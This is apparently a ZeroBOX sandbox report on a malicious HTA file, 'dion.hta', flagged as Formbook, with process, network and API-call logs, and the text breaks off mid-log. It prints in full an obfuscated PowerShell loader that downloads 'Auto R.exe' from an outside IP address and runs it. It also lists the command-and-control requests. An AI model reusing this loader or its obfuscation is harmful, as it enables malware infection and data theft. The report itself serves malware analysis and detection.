popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

dion.hta

Gen1 Formbook Process Kill Suspicious_Script_Bin Generic Malware UPX CryptGenKey Antivirus Malicious Library Malicious Packer FindFirstVolume PE File Device_File_Check OS Processor Check PE32 DLL PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us June 5, 2024, 9:21 a.m. June 5, 2024, 9:24 a.m.
Size 11.3KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 24be5183dd56c3d08bae8625fba83aaa
SHA256 7d0ce5265370af5d96aaca0951fa1666eb0228709894dd9faa6bde3463483298
CRC32 3A1DB495
ssdeep 96:zH8vkfbark/NEWbg1r+DfjVZffjhifjs2yDWXZz2djQJc0q4rrvyrqTx:zU3vVorrr4rs2lXZz2djQJc0qerco
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\dion.hta

    1540

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function IoDuzQtSmLZDsM($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ){[IO.File]::WriteAllBytes($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ)};function voHIPLrDYNfT($NQBZAVZqPrIkQg){if($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36814,36822,36822))) -eq $True){rundll32.exe $NQBZAVZqPrIkQg }elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36826,36829,36763))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $NQBZAVZqPrIkQg}elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36823,36829,36819))) -eq $True){misexec /qn /i $NQBZAVZqPrIkQg}else{Start-Process $NQBZAVZqPrIkQg}};function bLCRUDAbBUWM($IqJPBCxyWYxTCQSt){$yWYjmjlURBEIl = New-Object (SYLmPANEWfVOJtmHRo @(36792,36815,36830,36760,36801,36815,36812,36781,36822,36819,36815,36824,36830));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OPgEpjTaIklYKXZ = $yWYjmjlURBEIl.DownloadData($IqJPBCxyWYxTCQSt);return $OPgEpjTaIklYKXZ};function SYLmPANEWfVOJtmHRo($nzshJXeE){$tskKTS=36714;$COiODkHcfwmaYFp=$Null;foreach($yAxoMiZElttnpFen in $nzshJXeE){$COiODkHcfwmaYFp+=[char]($yAxoMiZElttnpFen-$tskKTS)};return $COiODkHcfwmaYFp};function ZTRjGimAXeKUwvjzZO(){$usmWGjdJwVKwRXAINHG = $env:AppData + '\';$HhNblOezkUWRgv = $usmWGjdJwVKwRXAINHG + 'Auto%20R.exe'; if (Test-Path -Path $HhNblOezkUWRgv){voHIPLrDYNfT $HhNblOezkUWRgv;}Else{ $rPdsmVToBcNWuu = bLCRUDAbBUWM (SYLmPANEWfVOJtmHRo @(36818,36830,36830,36826,36772,36761,36761,36763,36771,36770,36760,36764,36765,36760,36764,36762,36763,36760,36770,36771,36761,36833,36811,36828,36823,36761,36779,36831,36830,36825,36751,36764,36762,36796,36760,36815,36834,36815));IoDuzQtSmLZDsM $HhNblOezkUWRgv $rPdsmVToBcNWuu;voHIPLrDYNfT $HhNblOezkUWRgv;};;;;}ZTRjGimAXeKUwvjzZO;

      2160

Name Response Post-Analysis Lookup
www.sqlite.org
A 45.33.6.223
45.33.6.223
www.3xfootball.com
A 154.215.72.110
154.215.72.110
IP Address Status Action
154.215.72.110 Active Moloch
164.124.101.2 Active Moloch
198.23.201.89 Active Moloch
45.33.6.223 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:1 char:795
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + function IoDuzQtSmLZDsM($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ){[IO.File]::WriteAl
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: lBytes($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ)};function voHIPLrDYNfT($NQBZAVZqPrIkQ
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: g){if($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36814,36822,36822)))
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: -eq $True){rundll32.exe $NQBZAVZqPrIkQg }elseif($NQBZAVZqPrIkQg.EndsWith((SYLm
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: PANEWfVOJtmHRo @(36760,36826,36829,36763))) -eq $True){powershell.exe -Executio
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: nPolicy unrestricted -File $NQBZAVZqPrIkQg}elseif($NQBZAVZqPrIkQg.EndsWith((SYL
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: mPANEWfVOJtmHRo @(36760,36823,36829,36819))) -eq $True){misexec /qn /i $NQBZAVZ
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: qPrIkQg}else{Start-Process $NQBZAVZqPrIkQg}};function bLCRUDAbBUWM($IqJPBCxyWYx
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: TCQSt){$yWYjmjlURBEIl = New-Object (SYLmPANEWfVOJtmHRo @(36792,36815,36830,3676
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: 0,36801,36815,36812,36781,36822,36819,36815,36824,36830));[Net.ServicePointMana
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: ger]:: <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OPgEpjTaIklYK
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: XZ = $yWYjmjlURBEIl.DownloadData($IqJPBCxyWYxTCQSt);return $OPgEpjTaIklYKXZ};fu
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: nction SYLmPANEWfVOJtmHRo($nzshJXeE){$tskKTS=36714;$COiODkHcfwmaYFp=$Null;forea
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: ch($yAxoMiZElttnpFen in $nzshJXeE){$COiODkHcfwmaYFp+=[char]($yAxoMiZElttnpFen-$
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: tskKTS)};return $COiODkHcfwmaYFp};function ZTRjGimAXeKUwvjzZO(){$usmWGjdJwVKwRX
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: AINHG = $env:AppData + '\';$HhNblOezkUWRgv = $usmWGjdJwVKwRXAINHG + 'Auto%20R.e
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: xe'; if (Test-Path -Path $HhNblOezkUWRgv){voHIPLrDYNfT $HhNblOezkUWRgv;}Else{ $
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: rPdsmVToBcNWuu = bLCRUDAbBUWM (SYLmPANEWfVOJtmHRo @(36818,36830,36830,36826,367
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: ,36764,36762,36796,36760,36815,36834,36815));IoDuzQtSmLZDsM $HhNblOezkUWRgv $rP
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: dsmVToBcNWuu;voHIPLrDYNfT $HhNblOezkUWRgv;};;;;}ZTRjGimAXeKUwvjzZO;
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000173
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cedb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cee38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cee38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cee38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf6b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf6b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf6b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf6b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf6b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf6b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cee38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cee38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cee38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf778
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
0xa917a
0x940f6
0x9f49b
0x96f87
0xa4587
0x96e24
0xa44fb
0x919a2
0xa69d7
0x915c5
0xa42b7
0xa9760
0x89e57
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 66 39 01 74 0b 8d 49 00 40 66 83 3c 41 00 75 f8
exception.instruction: cmp word ptr [ecx], ax
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xaa848
registers.esp: 2873412
registers.edi: 2873456
registers.eax: 0
registers.ebp: 2873412
registers.edx: 0
registers.ebx: 2877956
registers.esi: 2006581772
registers.ecx: 0
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://198.23.201.89/warm/Auto%20R.exe
request GET http://198.23.201.89/warm/Auto%20R.exe
request POST http://www.3xfootball.com/fo8o/
request GET http://www.3xfootball.com/fo8o/?9LnGaVx=IhZyPQIGe6uK3zPwwQVGm4hCASyaX3xlW2eS79Xk6ut4afzj0LiRHBqZsEmyTx+18GfGhVOagMos+c9dx/PGjLGAfpOvJ7U3hUqpnKd0zHv/hQdGhX4G3JlCydyJ23yerjxn4r8=&9KJ=FLmtL7Haabh3IASW
request GET http://www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
request POST http://www.3xfootball.com/fo8o/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 1900544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02740000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71aa1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71aa2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02517000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02502000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02515000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02650000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02503000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02504000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02505000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02506000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02507000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02508000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02509000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
